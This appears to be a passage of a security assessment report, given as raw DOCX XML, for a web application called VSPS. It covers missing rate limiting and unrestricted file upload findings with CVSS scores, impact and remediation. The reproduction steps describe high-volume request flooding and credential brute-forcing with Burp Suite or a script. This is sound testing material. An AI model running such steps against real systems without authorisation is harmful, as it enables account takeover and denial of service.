    <w:p w14:paraId="16180FEE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• OWASP Top 10 2021: A03:2021-Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3427ED30" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3081A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• NIST Special Publication 800-53: Security and Privacy Controls for Information Systems and Organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271ABA18" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy: Blind XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761ECE1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C95C7E"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6A05B7D7"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51EDFEB3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Missing Rate Limiting</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32510A52" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="786A9AF4"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3BFD58C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CC77967"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B893A82" w14:textId="14BD342E"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031</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A96821D"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B0A7A29" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4E6D45F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142A023"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405FEC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Design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50C34F9"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058EC47" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-770</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="26D2678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123182F"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A63A707"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C0B9D38"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49B59D8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6DB37C2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0DB228C"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1C95A02"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48ED006"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5CF5317" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="299A4F7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9B00752"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1158C2A"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2AEE3A7"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A604095" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE7C066" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCBF6B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application's API endpoints, particularly those susceptible to enumeration or resource exhaustion, lack effective rate limiting mechanisms. Rate limiting is a security control designed to restrict the number of requests a user, IP address, or application can make to a server within a given timeframe. Without this control, an attacker can send an unlimited number of requests, leading to various attacks. The root cause is an insecure design choice where resource consumption and user request frequencies were not adequately considered or implemented at the API gateway or application layer. Exploitation works by an attacker sending a high volume of requests to an endpoint, such as a login form, password reset function, or data retrieval API. This can be achieved through automated scripts or tools. Affected components include any API endpoints that process user input, perform computationally intensive operations, or expose sensitive information that can be enumerated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D82A1A" w14:textId="723FDF04" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3E872" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The absence of proper rate limiting exposes the organization to severe business risks, including potential financial losses and operational disruptions. Attackers can leverage this vulnerability to perform denial-of-service (DoS) attacks, rendering critical services unavailable to legitimate users, directly impacting revenue and customer satisfaction. Furthermore, it enables brute-force attacks against authentication mechanisms, potentially leading to unauthorized account access and subsequent data breaches. Such incidents would incur significant costs for incident response, forensic investigations, and potential regulatory fines under compliance frameworks like NIST CSF. A data breach involving government data could lead to severe reputational damage, eroding public trust and undermining the organization's credibility. The integrity and availability of essential services could be compromised, leading to operational downtime and a loss of public confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48893A11" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53856C66" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C772C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a comprehensive API gateway solution or a centralized rate limiting service that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>applies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> global and endpoint-specific throttling policies. This architectural change ensures that rate limiting is enforced consistently across all APIs before requests reach the backend application. Design APIs to be stateless where possible to facilitate easier scaling and distributed rate limiting. Incorporate application security best practices throughout the software development lifecycle, emphasizing secure design principles from inception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D949EF6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A32440" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B27FC4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> server-side rate limiting on all public-facing API endpoints. This should include limits based on IP address, user session, and specific request parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC7E35" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  For</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> authentication-related endpoints (login, password reset, account creation), implement stricter rate limits and account lockout policies after a predefined number of failed attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2A8B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.  Utilize security headers and configuration settings in web servers (e.g., NGINX, Apache) or application frameworks (e.g., Struts, if feasible for external throttling) to enforce request limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E8ECE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Integrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAPTCHA or reCAPTCHA challenges for suspicious activity or after a certain number of failed attempts on sensitive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07693C06" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> robust logging and monitoring to detect and alert on anomalous request patterns that indicate a rate limiting bypass or an ongoing attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3054B8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F0CEE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Identify an API endpoint that processes user input, such as a login form (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/login) or a search function (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/search). 2. Using an HTTP interception proxy like Burp Suite or a scripting language (e.g., Python with requests library), send a single legitimate request to the target endpoint to understand its structure and expected parameters. 3. Configure an intruder attack (in Burp Suite) or a loop in your script to send </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests (e.g., hundreds or thousands) to the identified endpoint in a short period (e.g., within seconds or minutes), without any delays between requests. 4. Observe the server's responses. If no rate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limiting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is in place, the server will continue to respond with valid HTTP status codes (e.g., 200 OK, 400 Bad Request, 401 Unauthorized) without returning a '429 Too Many Requests' status code or blocking the requests. 5. Additionally, attempt to brute-force a specific parameter, such as usernames or passwords, on a login endpoint. Verify if the application allows an unlimited number of attempts without blocking the IP or user, confirming the absence of authentication-specific rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FEA7F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA3AA0E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/API-Security/editions/2023/en/0x11-api4-unrestricted-resource-consumption/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABFC377" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/770.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA6E64" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029DB15"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36D00AF5"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60C665B5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Unrestricted File Upload and Lack of Rate Limiting</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3638A99F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66413CCE"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498C3D5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FC6A8F0"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34BF3ED" w14:textId="215D24F4"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030</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3D9A4F1"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F995CDC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3CB684D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418F44A"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6086A2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Design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E19E731"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2C723D5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-770</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4186231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112D325"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A3AFE46"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4397004"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A8AFFD9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="675A18D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1FCFB8D"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14B3406"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D17C848"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46B66F8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="151C1EA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677439A"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8692278"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45C1FEC"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4181C4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72D106CB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE8BF0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The application allows users to upload files without adequate validation of file size and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lacks effective rate limiting on the upload functionality. The root cause is insufficient input validation and an absence of a throttling mechanism on the server-side processing of file uploads. This vulnerability enables an attacker to bypass intended file size restrictions by manipulating request parameters or by exploiting weaknesses in server-side validation. Furthermore, the absence of rate limiting permits an attacker to repeatedly submit requests, including numerous file uploads, without restriction. Exploitation involves an attacker uploading excessively large files or a high volume of files in rapid succession. This can consume significant server resources, including disk space, memory, and CPU, leading to a denial-of-service condition for legitimate users. The affected components include the file upload module, the application's file storage infrastructure, and potentially the underlying operating system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B4922" w14:textId="2F597901" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72417A1C" w14:textId="15373FA8" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability poses a significant risk of service disruption and operational downtime. An attacker could exploit the unrestricted file upload and lack of rate limiting to launch a denial-of-service attack, making the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application unavailable to legitimate users. This direct impact on system availability can lead to substantial financial losses due to lost productivity, interrupted business operations, and the high cost of incident response and recovery efforts. From a regulatory perspective, this directly violates the 'Protect' and 'Detect' functions within NIST CSF, specifically impacting the 'Data Security' and 'Maintenance' categories by failing to ensure the availability of systems and services. A prolonged outage or degraded performance can severely damage the organization's reputation and erode customer trust, potentially leading to long-term negative impacts on partnerships and public perception. Furthermore, if an attacker manages to fill storage or consume all available resources, it could compromise data integrity by preventing new data from being written or existing data from being accessed reliably, creating a critical operational failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F67F6E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F837129" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098EF56" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement a robust, multi-layered file upload validation and storage architecture. This includes enforcing strict file size limits at both the web server (e.g., Apache/Nginx) and application levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46228DFC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Introduce a dedicated, secure file storage service that can handle large volumes and enforce quotas, isolating the web application from direct storage concerns.</w:t>
      </w:r>
    </w:p>
